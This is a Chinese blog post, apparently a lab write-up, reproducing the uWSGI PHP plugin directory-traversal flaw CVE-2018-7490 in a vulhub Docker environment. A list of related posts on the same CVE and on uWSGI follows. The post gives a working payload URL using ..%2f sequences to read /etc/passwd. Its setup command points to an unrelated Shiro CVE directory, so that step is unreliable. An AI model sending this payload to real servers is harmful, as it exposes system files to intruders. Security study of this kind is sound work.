uWSGI PHP目录穿越 CVE-2018-7490 漏洞复现

最新推荐文章于 2022-10-15 16:30:00 发布
最新推荐文章于 2022-10-15 16:30:00 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: uWSGI PHP目录穿越 CVE-2018-7490 漏洞复现 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/119142131
版权

uWSGI PHP目录穿越 CVE-2018-7490 漏洞复现

一、漏洞描述

uWSGI 是一款 Web 应用程序服务器,它实现了 WSGI、uwsgi 和 http 等协议,并支持通过插件来运行各种语言。
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。

二、漏洞影响

uWSGI < 2.0.17

三、漏洞复现

1、环境搭建

执行如下命令运行存在漏洞的uWSGI服务器:

cd vulhub/shiro/CVE-2020-1957
docker-compose up -d

运行完成后,访问http://x.x.x.x:8080/即可看到phpinfo信息,说明 uWSGI-PHP 服务器已成功运行:
在这里插入图片描述

2、漏洞复现

访问http://x.x.x.x:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd,成功读取文件:
在这里插入图片描述

四、漏洞POC

访问http://x.x.x.x:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd,成功读取文件。

五、参考链接

https://github.com/vulhub/vulhub/blob/master/uwsgi/CVE-2018-7490/README.zh-cn.md

Senimo_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
uWSGI 未授权访问漏洞
weixin_51387754的博客
01-22 428
漏洞简介 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,通常被用于运行Python WEB应用。uwsgi除了是应用容器的名称之外,它和Fastcgi之类的一样,也是前端server与后端应用容器之间的一个交流标准。目前nginx,apache也支持uwsgi协议进行代理转发请求。 uWSGI支持通过魔术变量(Magic Variables)的方式动态配置后端Web应用。如果其端口暴露在外,攻击者可以构造uwsgi数据包,并指定魔术变量UW
修复uWSGI 未授权访问漏洞
最新发布
ling的专栏
07-07 581
阿里给出的建议 “禁用 uwsgi socket 协议或配置 uwsgi socket 仅能通过本地访问”当工程在容器中运行的时候,就不能设置仅本地访问了。所以只能以htttp方式启动uwsgi。nginx配置修改(无论是80端口的http,还是443端口的https,均是以下写法)将原uwsgi的启动命令(socket模式)
漏洞复现-uwsgi-目录穿越】vulfocus/uwsgi-cve_2018_7490
10-15 722
uwsgi-目录穿越
[漏洞复现]CVE-2018-7490(路径遍历)
volcano的博客
04-02 1914
受影响版本 uWSGI 2.0.17之前的版本 环境 https://github.com/vulhub/vulhub/blob/master/uwsgi/CVE-2018-7490 或者直接用BUUOJ里的环境 漏洞分析 uWSGI PHP Plugin < 2.0.17没能妥善处理DOCUMENT_ROOT检测的--php-docroot选项,导致攻击者可以通过带有‘…’序列的特制URL请求,恶意查看系统上的任意文件。 开始利用 打开buuoj的靶机,看到 先不使用exp里的payload,试试
CVE-2018-7490 uSWGI PHP遍历漏洞 vulhub复现
ANOrange的博客
06-15 696
记录vulhub靶场中CVE-2018-7490漏洞复现及小笔记
uwsgi-plugin-python-2.0.16-1.el7.x86_64.rpm
12-31
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
uwsgi-local-dns-resolver
06-01
uWSGI-local-DNS-resolver uWSGI-local-DNS-resolver(从现在开始uWSGI-DNS )是一个 DNS 服务器,它解析每个指向 uWSGI 订阅域的请求到localhost 。 为什么? 我们的主要目的是让用户透明地连接到通过 uWSGI ...
uwsgi-stats-pusher-statsd-2.0.16-1.el7.x86_64.rpm
12-31
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
uwsgi-2.0.18.tar.gz
07-02
1. **安装uwsgi**: 首先,你需要解压uwsgi-2.0.18.tar.gz,然后进入解压后的目录。通过运行`./configure`配置编译选项,接着执行`make`进行编译,最后使用`sudo make install`进行安装。 2. **配置uwsgi**: 创建一...
docker-django-nginx-uwsgi-postgres-tutorial-master
03-11
docker-django-nginx-uwsgi-postgres-tutorial-master
uwsgi-phpsgi:uWSGI 实验性插件,用于为 php 实现类似 WSGIPSGIRack 的接口
06-26
uwsgi-phpsgi uWSGI 实验性插件,用于为 php 实现 WSGI/PSGI/Rack-like 接口 这只是一个概念证明,除非你想帮助定义规范、修复错误或伤害自己,否则不要使用它 该插件没有(仍然)以正确的方式管理内存,因此它会严重泄漏 安装 确保您(在 debian/ubuntu 上)有 libphp5-embed 包,然后 uwsgi --build-plugin https://github.com/unbit/uwsgi-phpsgi 用法 uwsgi --plugin phpsgi --http-socket :9090 将从当前目录加载 app.php 并在每次请求时执行其“应用程序”功能: before <?php echo "foobar\n" ; function application ( $ env ) { print_r (
uWSGI PHP目录遍历漏洞 CVE-2018-7490 漏洞复现
ADummy的博客
03-03 440
uWSGI PHP目录遍历漏洞CVE-2018-7490) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ uWSGI是一个Web应用程序服务器,它实现诸如WSGI / uwsgi / http之类的协议,并通过插件支持多种语言。 2.0.17之前的uWSGIPHP插件无法DOCUMENT_ROOT正确检测到,导致无法DOCUMENT_ROOT通过使用读取或运行文件..%2f。 影响版本 uWSGI PHP Plugin < 2.0.17 0x 02漏洞
CVE-2018-7490 uWSGI PHP目录穿越漏洞
weixin_51387754的博客
01-17 3213
漏洞简介 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。 uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。 漏洞复现 运行存在漏洞uWSGI服务器: docker-compose up -d 运行完成后,访问http://your-ip:8080/即可看到phpinfo信息,说明uwsgi-php服务器已
CVE-2018-7490实验
weixin_44281516的博客
08-03 412
打开靶场看到uWSGI可能存在CVE-2018-7490漏洞 百度搜索CVE-2018-7490发现像是任意文件读取漏洞 开始利用 读取etc/passwd
CVE-2018-7490 uWSGI PHP Plugin目录遍历
king丶
07-12 846
#攻击标题:uWSGI PHP Plugin目录遍历 #日期:2018年3月1日 #开发作者:Marios Nicolaides-RUNESEC #评审人:西蒙·洛伊齐德斯和尼古拉斯·马基塔尼斯-鲁内塞克 #供应商主页:https://uwsgi-docs.readthedocs.io #受影响的软件:2.0.17之前的uWSGI PHP Plugin #测试依据:uWSGI 2.0.12和2.0.15 #公司代码:CVE-2018-7490 #类别:Web应用程序 概述 ...
uWSGI未经授权的访问漏洞 漏洞复现
ADummy的博客
03-04 320
uWSGI未经授权的访问漏洞 by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ uWSGI是一个Web应用程序服务器,它实现诸如WSGI / uwsgi / http之类的协议,并通过插件支持多种语言。就像Fastcgi一样,uwsgi不仅是应用程序名称,还是前端服务器和后端应用程序容器之间的交换标准。 uWSGI允许通过Magic Variables动态配置后端Web应用程序。如果端口暴露在外,攻击者可以构造uwsgi数据包并指定magic变量UWSGI_FILE,从
CVE-2018-7490-uWSGI 任意文件读取漏洞
战神/calmness的博客
10-12 716
目录 1、描述 2、影响 3、过程 4、修复建议 uWSGI 任意文件读取漏洞 1、描述 uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。 该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发...
uwsgi的reload-on-rss是干什么的
06-10
`uwsgi` 是一款高性能的Web应用程序服务器,`reload-on-rss` 是`uwsgi` 的一个配置选项,用于设置当应用程序的内存占用达到一定值时,`uwsgi` 是否需要自动重载应用程序。 具体来说,`reload-on-rss` 选项会根据指定的内存阈值(单位为MB)来监控应用程序的内存占用情况。如果应用程序的内存占用超过了该阈值,`uwsgi` 就会自动重载应用程序,以释放内存资源。 这个选项主要用于避免应用程序因为内存占用过高而导致系统性能下降或者崩溃的情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值